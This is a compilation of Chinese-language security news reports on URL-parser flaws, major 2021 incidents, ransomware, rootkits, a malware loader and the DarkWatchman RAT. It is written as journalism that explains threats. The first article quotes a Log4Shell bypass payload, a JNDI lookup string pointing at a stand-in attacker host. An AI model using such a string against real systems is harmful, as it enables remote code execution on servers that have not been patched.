Hackernews 编译，转载请注明出处： 研究员在对16种不同的URL解析库进行研究时发现了不一致和混淆，这可能被用来绕过验证，并且易受到黑客的攻击。 在一项由网络安全公司 Claroty 和 Synk 联合进行的深入分析中，他们在许多第三方库中发现八个安全漏洞，这些漏洞是用 C、 JavaScript、 PHP、 Python 和 Ruby 语言编写的，并被多个 web 应用程序使用。 研究人员在与 The Hacker News 共享的一份报告中表示: “ URL 解析中的混乱可能会导致软件中出现意想不到的情况(比如 web 应用程序) ，并可能被攻击者利用来导致拒绝服务情况、信息泄露，或者可能造成远程代码执行攻击。” 由于 URL 是一种基本机制，可以请求和检索位于本地或网络上的资源，解析库阐释 URL 请求的差异可能会给用户带来重大风险。 一个典型的例子是上个月在无处不在的 Log4j 日志框架中披露的 Log4Shell 漏洞，这个缺陷的原理是这样的，即当一个易受攻击的应用程序对一个恶意攻击者控制的字符串进行日志记录时，该字符串会导致一个 JNDI 查找，该字符串连接到一个攻击者操作的服务器，并执行任意的 Java 代码。 尽管美国 Apache软件基金会安全局(ASF)很快提出了一个修复方案来解决这个问题，但是很快就发现通过”${jndi:ldap://127.0.0[.]1#.evilhost.com:1389/a}” 格式的特制输入可以绕过这个方案，再次允许远程 JNDI 查找实现代码执行。 “这种绕过原理是这样的，即两个不同的(!)URL 解析器在 JNDI 查找过程中被使用了 ，一个解析器用于验证 URL，另一个解析器用于获取 URL，并且根据每个解析器如何处理 URL 的片段部分(#) ，权限也会发生变化,”研究人员说。 具体来说，如果输入被视为一个常规的 HTTP URL，Authority 组件(域名和端口号的组合)将在遇到片段标识符时结束，而如果将其视为一个 LDAP URL，解析器将分配整个”127.0.0[.]1#.evilhost.com:1389″作为权限，因为 LDP URL 规范没有说明片段。 实际上，能够发现这八个漏洞有两个主要原因，使用多个解析器是其一，另一个原因是当库遵循不同的 URL 规范时出现不一致问题时，实际上引入了一个可利用的漏洞。 混淆中不协调的URL包含反斜杠(“\”)，不规则的斜杠数量(例如, https:///www.example[.]com)或者 URL 编码数据(“%”)，有的URL缺少 URL 方案，这可能被用来获得远程代码执行，甚至出现拒绝服务(DoS)和开放重定向钓鱼攻击。 发现的8个漏洞列表如下，所有这些漏洞都已经由各自的维护者解决了 Belledonne’s SIP Stack (C, CVE-2021-33056) Video.js (JavaScript, CVE-2021-23414) Nagios XI (PHP, CVE-2021-37352) Flask-security (Python, CVE-2021-23385) Flask-security-too (Python, CVE-2021-32618) Flask-unchained (Python, CVE-2021-23393) Flask-User (Python, CVE-2021-23401) Clearance (Ruby, CVE-2021-23435) “许多现实生活中的攻击场景可能来自不同的解析原语,”研究人员说。为了保护应用程序不受 URL 解析漏洞的影响，“有必要充分了解是什么解析器参与了整个过程，解析器之间的区别，它们如何解释不同的错误 URL，以及它们支持什么类型的 URL。”  消息来源：TheHackerNews，译者：Zoeppo； 本文由 HackerNews.cc 翻译整理，封面来源于网络； 转载请注明“转自 HackerNews.cc ” 并附上原文

作者：知道创宇404实验室 （转载本文请注明出处：https://hackernews.cc/archives/37193）   在网络安全领域，2021年注定是不平静的一年。世界各地频发网络安全事件，诸如数据泄漏、勒索软件、黑客攻击等等层出不穷，有组织、有目的的网络攻击形势愈加明显，网络安全风险持续增加。另外，我国也颁布了多项网络安全相关法律法规，为我国互联网安全领域法律法规的完善之路拉开了序幕。本文以“创宇资讯”视角出发，筛选并总结出了2021年最受关注的十大网络安全事件。   事件一：《中华人民共和国数据安全法》《关键信息基础设施安全保护条例》《中华人民共和国个人信息保护法》等网络安全相关法律施行。   《中华人民共和国数据安全法》 详情链接：https://mp.weixin.qq.com/s/OOEQqZECu-TbWBZ86_O1Dg 于2021年9月1日起施行。该部法律体现了总体国家安全观的立法目标，聚焦数据安全领域的突出问题，确立了数据分类分级管理，建立了数据安全风险评估、监测预警、应急处置，数据安全审查等基本制度，并明确了相关主体的数据安全保护义务，这是我国首部数据安全领域的基础性立法。   《关键信息基础设施安全保护条例》 详情链接：https://mp.weixin.qq.com/s/e8lv9giBX-EXk0ZWv8cvlw 于2021年9月1日起施行。该部法律明确了关键信息基础设施的定义及认定程序；明确建立了网络安全信息共享机制；规定任何个人和组织未经授权不得对关键信息基础设施进行探测测试等可能影响或危害关键信息基础设施安全的活动。是在《网络安全法》框架下全面规范关键信息基础设施安全保护的基础性法规，是加强网络安全领域立法、完善网络安全保护法律法规体系的重要举措，为我国深入开展关键信息基础设施安全保护工作提供有力法治保障。   《中华人民共和国个人信息保护法》 详情链接：https://mp.weixin.qq.com/s/KYH400MOTBDPgwCUCN3FCA 于2021年11月1日起施行。该部法律围绕个人信息的处理，从处理规则、跨境提供、个人权力、处理者义务、保护职责部门以及法律责任等不同角度确立了相应规则，并且针对敏感个人信息和国家机关处理强调了特别规则。其出发点是保护个人对于个人信息处理享有的权力，厘清企业等个人信息处理者应当遵循的规则和履行的义务，同时明确违法和侵权行为的法律责任。此律成为中国第一部专门规范个人信息保护的法律，对我国公民的个人信息权益保护以及各组织的数据隐私合规实都将产生直接和深远的影响。     事件二：黑客攻击美国佛罗里达水务公司，供水系统险遭“投毒” 详情链接：https://hackernews.cc/achives/37181 2月8日，一名黑客侵入了佛罗里达州奥德马尔的一家水处理厂，通过篡改可远程控制的计算机数据，将该厂水中的氢氧化钠含量调高到了极其危险的水平，让整个城市的人都差点中毒。幸运的是，水厂的运营商及时发现了问题，避免了一场灾难。此次入侵，使美国关键基础设施在网络攻击面前的持续脆弱性暴露无遗。凸显了市政基础设施面临网络攻击的风险。水务投毒事件一度引起水务行业甚至关键基础设施行业的极度恐慌。     事件三：微软Exchange Server 产品曝严重安全漏洞，FBI从被黑服务器中移除后门 详情链接：https://hackernews.cc/archives/35131 https://hackernews.cc/archives/35212
3月2日，微软发布了Microsoft Exchange Server的安全更新公告，其中包含多个Exchange Server严重安全漏洞，危害等级为“高危”。并且已经受到了一个名为Hafnium的国家支持的黑客组织的攻击。微软第一时间修复这些漏洞，但发布的补丁并未关闭已经遭入侵的服务器的后门，其他黑客组织几天后纷纷开始效仿，纷纷针对Exchange服务器进行攻击。该安全漏洞使全球多个国家或地区的企业、政府机构、教育机构以及医疗机构等出现严重的信息泄露问题。因此，美国司法部于4月13日宣布一项由美国休斯敦法院授权的行动，批准FBI利用黑客方式删除Exchange Server后门程序。     事件四：美国保险巨头CNA Financia被勒索4000万美元赎金，破赎金最高纪录 详情链接：https://www.cnbeta.com/articles/tech/1130609.htm 今年3月底，美国最大的保险公司之一CNA Financial被勒索软件攻击，在试图恢复文件无果之后，他们开始与攻击者谈判，黑客要求的赎金高达6000万美元。最后，CNA Financial在事件发生两周后支付了4000万美元赎金，以重新获得对其网络的控制权。根据目前已公开的勒索病毒付款事件，CNA Financial以4000万美元赎金“强势登顶”，创下迄今为止已知的最大勒索软件赎金支付。   事件五：两大数据泄露事件——Facebook 5.33亿用户、领英7亿用户数据泄露，于暗网出售 详情链接：https://hackernews.cc/archives/35159 https://hackernews.cc/archives/37186 4月，据外媒《The Record》报道，来自106个国家和地区的超过5.33亿Facebook用户的个人信息在一个黑客论坛上被泄露，包括用户的个人信息，如Facebook ID、全名、地点、出生日期、电子邮件地址以及用户可能在个人资料中输入的其他任何内容。此外，数据库还包含所有用户的电话号码，一些没在网站上公开电话号码的用户也没能幸免。这批数据通过随机抽样检测验证了真实性。不久，又一起重大信息泄露事件发生，在6月22日，有黑客在暗网平台出售超过7亿领英用户数据发布一个包含100万领英用户的样本数据集。据悉，领英有7.56亿用户，也就是说有约92%的领英用户可以在该泄露的数据库中检索到个人的信息。此次事件也成为领英历史以来最大规模的数据泄漏。     事件六：美国最大成品油管道运营商Colonial Pipeline遭到网络攻击 详情链接：https://hackernews.cc/archives/35338 https://hackernews.cc/archives/35368   2021年5月7日（美国当地时间），美国最大成品油管道运营商Colonial Pipeline遭到网络攻击，此次攻击事件导致提供美国东部沿海主要城市45%燃料供应的输送油气管道系统被迫下线。极大影响了美国东海岸燃油等能源供应，美国政府宣布进入国家紧急状态。最终Colonial Pipeline支付了将近500万美元的赎金以恢复被攻击的系统。本次攻击成为美国能源系统有史以来遭遇的最严重网络袭击。     事件七：SolarWinds事件背后由俄罗斯支持的Nobelium黑客瞄准全球IT供应链 详情链接：https://hackernews.cc/archives/36551 10月25日，微软威胁情报中心发布报告称，去年SolarWinds黑客事件背后由俄罗斯支持的Nobelium威胁集团自2021年5月以来一直在开展持续性的攻击活动，微软在发现这些攻击后通知了受影响的目标，还在威胁保护产品中增加了检测功能，使这些目标在未来能够发现入侵企图。自7月以来，超过600名微软客户成为目标。自2021年5月以来，有140家管理服务提供商（MSP）和云服务提供商受到攻击，至少有14家被攻破。   事件八：微软称其抵挡了有史以来最大的 DDoS 攻击 带宽负载高达 2.4 Tbps 详情链接：https://hackernews.cc/archives/36395 微软披露其已经缓解了一场发生于8月份的2.4Tbps分布式拒绝服务（DDoS）攻击。这次攻击针对欧洲的一个Azure客户，比微软在2020年记录的最高攻击带宽量高出140%。它也超过了之前最大的攻击2.3Tbps的峰值流量，这是在去年针对亚马逊网络服务的攻击。亚马逊网络服务（AWS）之前保持着最大的DDoS攻击防御的记录，也就是上面所说的2.3Tbps的尝试，超过了NetScout Arbor在2018年3月保持的1.7Tbps的前记录。     事件九：核弹级漏洞log4shell席卷全球 详情链接：https://hackernews.cc/archives/37005 https://hackernews.cc/archives/37035 https://hackernews.cc/archives/37070   12月10日公开的核弹级漏洞log4shell席卷全球 。新西兰计算机紧急响应中心（CERT）、美国国家安全局、德国电信CERT、中国国家互联网应急中心（CERT/CC）等多国机构相继发出警告。全球近一半企业因为该漏洞受到了黑客的试图攻击。已证实服务器易受到漏洞攻击的公司包括苹果、亚马逊、特斯拉、谷歌、百度、腾讯、网易、京东、Twitter、 Steam等。据统计，共有6921个应用程序都有被攻击的风险。其危害程度之高，影响范围之大，以至于不少业内人士将其形容为“无处不在的零日漏洞”。并且，Log4j 漏洞可能需要数月甚至数年时间才能妥善解决。     事件十：英国国家打击犯罪局向HIBP披露 5.85 亿个被泄露的密码 详情链接：https://hackernews.cc/archives/37087   英国国家犯罪署(NCA)与Have I Being Pwned(HIBP)网站共享了在调查期间发现的超过5.85亿个被盗密码的集合，该网站为安全漏洞数据编制索引。在美国联邦调查局FBI于5月份开始与Have I Being Pwned进行类似的合作之后，NCA现在成为第二个正式向HIBP提供被黑密码的执法机构 。  

美国Broward Health公共卫生系统近日披露了一起大规模数据泄露事件，影响到1357879人。Broward Health是一个位于佛罗里达州的医疗系统，有三十多个地点提供广泛的医疗服务，每年接收超过60000名入院病人。 该医疗系统在2021年10月15日披露了一起网络攻击事件，当时一名入侵者未经授权访问了医院的网络和病人数据。该组织在四天后，即10月19日发现了这次入侵事件，并立即通知了美国联邦调查局和美国司法部。 同时，所有员工被建议更改他们的用户密码，Broward Health与第三方网络安全专家签约，帮助进行调查。 调查显示，入侵网站的黑客获得了病人的个人医疗信息，其中可能包括以下内容： 全名 出生日期 实际地址 电话号码 财务或银行信息 社会安全号码 保险信息和账户号码 医疗信息和历史 病情、治疗和诊断 驾照号码 电子邮件地址 尽管Broward Health确认黑客已经泄露了上述数据，但它指出，没有证据表明他们滥用了这些数据。值得注意的是，入侵点被确定为一个第三方医疗机构，他们被允许进入系统以提供服务。 “为了应对这一事件，Broward Health正在采取措施防止类似事件的再次发生，其中包括正在进行的调查，在整个企业中加强安全措施的密码重置，以及对其系统的所有用户实施多因素认证，”Broward Health在向受影响的病人和雇员数据泄露通知解释称。 “我们还开始对不由Broward Health信息技术公司管理的访问我们网络的设备实施额外的最低安全要求，这些要求将于2022年1月生效。” 由于暴露数据的关键性质，通知的接收者需要对所有形式的通信保持警惕。此外，该医疗系统正在通过Experian提供为期两年的身份盗窃检测和保护服务，信中还附有如何注册的详细信息。   （消息及封面来源：cnBeta）

Hackernews 编译，转载请注明出处：   我们发现一个以前未知的rootkit，它瞄准了惠普企业的Integrated Lights Out（iLO）服务器管理技术，并进行攻击，篡改固件模块并彻底清除受感染系统中的数据。 伊朗网络安全公司Amnpardaz本周记录了这一发现，这是iLO固件中第一个真实恶意软件的实例。 “iLO有许多特点使其成为恶意软件和APT组织的理想乌托邦：极高的权限（高于操作系统中的任何访问级别）；对硬件的访问级别非常低；管理员和安全工具难以检测检测；大众普遍缺乏检查和/或保护iLO的知识和工具，即使在更改操作系统后，恶意软件仍能持久存在，更强的是，它能始终运行且不关闭，”研究人员说。 除了管理服务器外，iLO模块还可以广泛访问服务器上安装的所有固件、硬件、软件和操作系统（OS），这一事实使它们成为破坏 HP服务器的组织的理想选择，同时也使恶意软件能够在重新启动后保持持久性并在重新安装操作系统后存活。然而，用于渗透网络基础设施和部署数据清洁器的确切操作方式仍然未知。   名为iLOBleed的rootkit自2020年开始用于攻击，其目标是操纵大量原始固件模块，以秘密阻止固件更新。具体地说，对固件例程所做的修改仿造了固件升级过程——据称显示了正确的固件版本并添加了相关日志——而实际上没有执行更新。 研究人员说：“仅此一点就表明，这种恶意软件的目的是成为一个具有最大隐秘性的rootkit，并躲避所有安全检查。”“通过隐藏在最强大的处理资源之一（始终处于运行状态）中，能够执行攻击者发送的任何命令，而不会被检测到。”   尽管敌手身份不明，但Amnpardaz将该rootkit描述为可能是高级持续威胁（APT）的手笔，APT是一个民族国家或国家赞助的团体，使用连续、秘密，以及复杂的黑客技术，以获得对系统的未经授权的访问，并在设备内部长时间停留而不引起注意。 如果有什么不同的话，黑客技术的进步再次将固件安全性纳入了关注的焦点，这就需要及时应用制造商提供的固件更新以降低潜在风险，将iLO网络与操作网络分开，并定期监控固件是否存在感染迹象。 研究人员指出：“另一个重要的问题是，有一些方法可以通过网络和主机操作系统访问和感染iLO。”“这意味着，即使iLO网络电缆完全断开，仍有可能感染恶意软件。有趣的是，就算不使用iLO，也无法完全关闭或禁用iLO。”   消息来源：TheHackerNews，译者：Zoeppo； 本文由 HackerNews.cc 翻译整理，封面来源于网络； 转载请注明“转自 HackerNews.cc ” 并附上原文

Hackernews 编译，转载请注明出处： QNAP网络连接存储（NAS）设备的用户报告了eCh0raix勒索软件（也称为QNAPCrypt）对其系统的攻击。 这一特定恶意软件背后的攻击者在圣诞节前一周左右加强了攻击力度，用管理员权限控制设备。 圣诞节前攻击次数增加 BleepingComputer 论坛用管理QNAP和Synology NAS系统的用户定期报告eCh0raix勒索软件攻击，但是在12月20日左右，才有众多用户开始披露事件。 ID勒索软件服务记录了攻击数量的激增，提交的申请在12月19日开始增加，到12月26日逐渐减少。   目前尚不清楚最初的感染媒介。一些用户说他们行事鲁莽，没有好好保护设备（例如，通过不安全的连接将其暴露在互联网上）；其他人则声称QNAP照片站中存在一个漏洞，使得攻击者有机可乘。 是的，我知道我是一个彻底的白痴，因为我把设备暴露给了这种类型的黑客，但我并没有认真对待这些。我一直以为没人想要攻击它，我要立马说我错了！ 无论攻击路径如何，eCh0raix勒索软件攻击者似乎在管理员组中创建了一个用户，这使他们能够加密NAS系统上的所有文件。 QNAP用户（其中一些用户出于业务目的使用NAS设备）在 BleepingComputer论坛说该恶意软件对图片和文档进行了加密。 除了攻击次数激增外，这场攻击中最突出的是，攻击者错误地输入了赎金通知的扩展，并使用了“.TXTT”扩展。     虽然这并不妨碍查看说明，它可能会给一些用户带来问题，用户必须用特定的程序(如记事本)指示操作系统打开文件或将其加载到上述程序中。 BleepingComputer发现，在最近的攻击中，ech0raix勒索软件的要求从0.024比特币(1200美元)到0.06比特币(3000美元)不等。有些用户别无他选，不得不付钱给黑客来恢复他们的文件。   需要注意的是，有一个免费的解密器，用于应对旧版本(2019年7月17日之前)的eCh0raix勒索软件。然而，没有免费的解决方案来解密被最新版本的恶意软件(版本1.0.5和1.0.6)锁定的数据。 使用eCh0raix/QNAPCrypt的攻击始于2019年6月，此后一直持续威胁用户。今年早些时候，QNAP提醒用户注意另一波针对带有弱密码设备的eCh0raix攻击。 用户应该遵循QNAP的建议，以确保对其NAS设备和存储的数据进行适当的保护。   消息来源：BleepingComputer，译者：Zoeppo； 本文由 HackerNews.cc 翻译整理，封面来源于网络； 转载请注明“转自 HackerNews.cc ” 并附上原文

Hackernews 编译，转载请注明出处： 注重隐私的搜索引擎 DuckDuckGo 增长迅速，该公司平均每天搜索查询超过1亿个，在2021年间增长了近47%。 与其他搜索引擎不同，DuckDuckGo说他们不会跟踪你在其他网站上的搜索或行为。DuckDuckGo搜索页面构建的用户配置文件不是用于显示个性化广告，它显示的广告是基于搜索的关键字。 这意味着，如果您在DuckDuckGo上搜索电视，该搜索查询将不会用在您访问的每个其他网站上。 此外，为了建立他们的搜索索引，搜索引擎使用DuckDuckBot蜘蛛来抓取网站并从合作伙伴（如维基百科和Bing）接收数据。然而，他们并不使用谷歌的数据建立索引。 DuckDuckGo显示出快速增长 虽然谷歌仍然是主要的搜索平台，但DuckDuckGo的年增长率依然令人印象深刻。 2020年，DuckDuckGo 共收到236亿条搜索查询，截至12月底，每天平均收到7900万条搜索查询。 在2021，DuckDuckGo收到346亿个总搜索查询（截至目前），平均每天有1亿个搜索查询，显示了46.4%的增长。 虽然DuckDuckGo的增长相当可观，但它仍然只占总市场份额的2.53%，雅虎占3.3%，必应占6.43%，谷歌占美国搜索引擎流量的87.33%。 然而，随着人们不断地对谷歌、Facebook、微软和苹果等科技巨头使用用户数据的方式感到失望，我们可能会看到更多的人转向关注隐私的搜索引擎。 为了进一步帮助用户保护他们的隐私，DukDukGo发布了一个电子邮件转发服务，在2021被称为“电子邮件保护”，它没有电子邮件跟踪器，并允许用户保护其真实的电子邮件地址。 他们还推出了“Android应用程序跟踪保护”，阻止在应用程序中来自谷歌和Facebook的第三方跟踪程序。 最近，DuckDuckGo宣布他们将发布一款DuckDuckGo桌面隐私浏览器，该浏览器将不基于Chromium，而是从头开始构建。 “没有复杂的设置，没有误导性的警告，没有隐私保护“级别”——只有强大的隐私保护，在默认情况下，可以跨搜索、浏览、电子邮件等进行保护，”最近一篇关于DuckDuckGo的博文说道。 “它不是一个“隐私浏览器”；它是一个尊重您隐私的日常浏览应用程序，因为现在是阻止公司监视您的搜索和浏览历史的最佳时机。” 对于那些希望拿回数据控制权并为搜索行为增加更多隐私的人来说，DuckDuckGo可能是最适合搜索引擎。   消息来源：BleepingComputer，译者：Zoeppo； 本文由 HackerNews.cc 翻译整理，封面来源于网络； 转载请注明“转自 HackerNews.cc ” 并附上原文

Hackernews 编译，转载请注明出处： 安全研究人员发现了一个恶意攻击活动，该攻击活动借助有效的代码签名证书将恶意代码伪装成合法的可执行文件。 研究人员称之为Blister的有效载荷，充当其他恶意软件的加载程序，它似乎是一种新的威胁，具有较低的检测率。 Blister背后的攻击者一直依赖多种技术来监视他们的攻击，使用代码签名证书只是他们的伎俩之一。 签名、盖章、交付 Elastic搜索公司的安全研究人员发现，自9月15日以来，无论是谁幕后操纵着Blister恶意软件，都至少已经开展了三个月的活动。 攻击者使用了8月23日起有效的代码签名证书。它是由数字身份提供商Sectigo为一家名为Blist LLC的公司发行的，其电子邮件地址来自一家俄罗斯提供商Mail.Ru。 使用有效证书对恶意软件进行签名是攻击者多年前就会的老把戏。当时，他们常常从合法公司窃取证书。如今，攻击者要求使用他们所感染的公司或前线业务的详细信息获得有效的证书。 在本周的一篇博客文章中，Elastic表示，他们负责地向Sectigo报告了被滥用的证书，以便Sectigo可以撤销该证书。 研究人员说，攻击者依靠多种技术使攻击不被发现。一种方法是将Blister恶意软件嵌入合法库（例如colorui.dll）。 然后通过rundll32命令，用提升后的权限执行恶意软件。使用有效的证书进行签名并使用管理员权限进行部署会使安全解决方案失效。 Elastic研究人员说，在下一步中，Blister将从资源部分解码“严重模糊”的引导代码。十分钟里，代码处于休眠状态，可能是为了躲避沙箱分析。 然后，它通过解密提供远程访问并允许横向移动的嵌入式有效载荷Cobalt Strike和BitRAT开始行动，这两种载荷过去曾被多个攻击者使用。 该恶意软件通过ProgramData文件夹中的一个副本和另一个伪造的rundll32.exe实现持久性。它还被添加到启动位置，因此它在每次启动时都会作为explorer.exe的子项启动。 Elastic的研究人员发现了Blister加载器的签名版本和未签名版本，在VirusTotal扫描服务上，这两个版本的防病毒引擎的检测率都很低。 虽然这些初始感染媒介的攻击的目标尚不清楚，但通过结合有效的代码签名证书、嵌入合法库中的恶意软件以及在内存中执行的有效负载，攻击者成功攻击的机会增加了。 Elastic创建了一个Yara规则，用于识别Blister活动，并提供IOC，以帮助组织抵御威胁。     消息来源：BleepingComputer，译者：Zoeppo； 本文由 HackerNews.cc 翻译整理，封面来源于网络； 转载请注明“转自 HackerNews.cc ” 并附上原文

Hackernews 编译，转载请注明出处： NCC集团的安全分析师报告说，2021年11月的勒索攻击增加，双敲诈不断成为攻击者武器库的有力工具。 攻击者的重点也转移到属于政府部门的实体，这些实体收到的攻击比10月份多400%。 11月的焦点显然是PYSA勒索软件组织（又名Mespinoza），该组织感染的设备呈爆炸性上升，增长了50%。 其他占主导地位的勒索软件组织是Lockbit和Conti，它们对关键实体发起了攻击，尽管数量比前几个月有所减少。 2021年3月，越来越明显的迹象表明，PYSA活动达到了威胁水平，导致联邦调查局发布了一个关于攻击者活动升级的警报。 与目前几乎所有勒索软件组一样，PYSA从受损网络中过滤数据，然后对原始数据进行加密以中断操作。 被盗文件被用作赎金谈判的筹码，攻击者威胁说，如果不支付赎金，将公开发布数据。 敲诈勒索新趋势及策略   NCC集团报告关注的另一个攻击者是Everest，一个讲俄语的勒索团伙，目前正在使用一种新的勒索方法。 只要他们的赎金要求在预计的谈判时间内得不到满足，Everest就会将受害者公司网络的访问权卖给其他黑客。 这种做法给受损实体带来了额外的麻烦，因为它们现在必须同时应对多个感染和重复攻击。 NCC 集团的报告评论道：“虽然把勒索软件当作商品售卖这一模式在过去一年中大受欢迎，但一个组织放弃勒索请求并提供IT基础设施访问权，这是一个罕见的例子——但我们可能会在2022年及以后看到模仿行为。”。 预计在12月和未来几个月内，另一个趋势是利用Log4Shell漏洞部署勒索软件有效载荷。 Conti已经致力于开发基于Log4Shell漏洞的感染链，并可能利用它对易受攻击的网络执行攻击。 勒索软件是一种不断变化的威胁，它会迅速演变为新的攻击，因此需要采取一些安全预防措施来充分防范它。     消息来源：BleepingComputer，译者：Zoeppo； 本文由 HackerNews.cc 翻译整理，封面来源于网络； 转载请注明“转自 HackerNews.cc ” 并附上原文

新兴游戏物品 NFT 交易平台 Fractal 遭遇黑客的攻击。本周二，该平台通过官方 Discord 频道发送了一条购物链接，但实际上这是个窃取用户加密货币而设立的骗局。 遵循该链接并连接他们的加密货币钱包的用户，期望收到一个 NFT，却发现他们持有的 Solana（SOL） 加密货币被清空并转移到骗子的账户。另一个 NFT 游戏项目的创始人 Tim Cotten 在 Medium 上发布的分析报告估计，被盗的 SOL 价值约为 15 万美元。 Fractal 是 Twitch 联合创始人 Justin Kan 的一个创业项目，专门从事代表游戏内资产的 NFT 的买卖。它在 12 月初宣布成立，并迅速通过 Discord 积累了超过 10 万名用户的粉丝–这使得它成为自一开始就困扰 NFT 项目的那种骗子的目标。 消息传到了Twitter上，Kan的一条推文告诉粉丝们，Fractal的Discord服务器上的公告机器人被黑掉了。另一条来自FractalTwitter主账户的推文证实，一个欺诈性的链接已经通过该渠道发布。 尽管来自 Discord 机器人的帖子是假的，但 Fractal 的官方Twitter账户在被黑几个小时前发布了一条推文，暗示即将进行空投（airdrop）：这是一个加密货币项目分发一些代币的过程，通常是向早期采用者的用户分发。由于对代币矿场和空投的需求通常非常高，当快照宣布时，用户快速行动的压力创造了一个攻击媒介，而骗子们都很乐意利用这一媒介。   （消息及封面来源：cnBeta）

Hackernews 编译，转载请注明出处： 一种名为“DarkWatchman”的新恶意软件出现在地下网络犯罪组织中，它是一种轻量级、功能强大的 JavaScript RAT（远程访木马），与C#键盘记录器配对。 根据 Prevailion 研究人员的一份技术报告，这种新型 RAT 是由讲俄语的攻击者部署的，他们的目标主要是俄罗斯的组织。 在11月初发现了DarkWatchman的第一次踪迹，当时攻击者开始通过带有恶意ZIP附件的网络钓鱼电子邮件传播恶意软件。   这些ZIP文件附件包含一个使用图标模拟文本文档的可执行文件。此可执行文件是一个自行安装的WinRAR归档文件，可以安装RAT和键盘记录器。   如果打开文件，用户将看到一条陷进弹出消息，内容为“未知格式”，但实际上，有效载荷已安装在后台。 DarkWatchman是一个非常轻量级的恶意软件，JavaScript RAT的大小只有32kb，而编译后的RAT只占用了8.5kb的空间。 它利用了大量的“LotL”二进制文件、脚本和库，并采用了隐蔽的方法在模块之间传输数据。 DarkWatchman的过人之处在于它为键盘记录器使用了Windows注册表无文件存储机制。 不再将键盘记录器存储在磁盘上，而是创建一个计划任务，以便在用户每次登录Windows时启动DarkWatchman RAT。   一旦启动，Darkwatchen将执行PowerShell脚本，该脚本使用.NET CSC.exe命令编译键盘记录器，并将其启动到内存中。 “键盘记录器作为模糊化的C#源代码分发，并作为Base64编码的PowerShell命令处理和存储在注册表中。当RAT启动时，它执行这个PowerShell脚本，该脚本反过来编译键盘记录器（使用CSC）并执行它，” Privailion研究人员Matt Stafford和Sherman Smith在他们的研究报告中解释道。 键盘记录器本身不与C2通信或写入磁盘。相反，它将其键盘日志写入一个用作缓冲区的注册表项。在其运行过程中，RAT会在将记录的击键发送到C2服务器之前清除该缓冲区。   因此，注册表不仅用作隐藏编码的可执行代码的地方，而且还用作临时位置来保存窃取的数据，直到它被提取到C2。 在C2通信和基础设施方面，DarkWatchman 的操作者使用DGA（域生成算法）和10项种子列表，每天生成多达500个域。 这给了他们卓越的生存能力，同时也使得通信监控和分析变得更具挑战性。 DarkWatchman的功能如下： 执行EXE文件（返回或不返回输出） 加载DLL文件 在命令行上执行命令 执行WSH命令 通过WMI执行其他命令 执行PowerShell命令 评估JavaScript 从受害计算机将ILE上载到C2服务器 远程停止并卸载RAT和键盘记录器 远程更新C2服务器地址或呼叫总部超时 远程更新RAT和键盘记录器 将autostart JavaScript设置为在RAT启动时运行 C2弹性域生成算法（DGA） 如果用户具有管理员权限，则会使用vssadmin.exe删除影副本 Privailion认为，DarkWatchman可能是由勒索软件集团定制的，或者是为勒索软件集团量身定做，因为它们需要为能力较弱的附属组织提供一种强大而隐蔽的工具。 该恶意软件可以远程加载额外的有效载荷，因此可以作为后续勒索软件部署的感染第一阶段。 由于DarkWatchman可以在初始感染后与攻击者控制的域通信，勒索软件操作者可以接管并部署勒索软件或直接进行文件提取。 这种方法将使分支组织的角色降级为网络渗透者，同时使RaaS操作更加实用和高效。     消息来源：BleepingComputer，译者：Zoeppo； 本文由 HackerNews.cc 翻译整理，封面来源于网络； 转载请注明“转自HackerNews.cc ” 并附上原文链接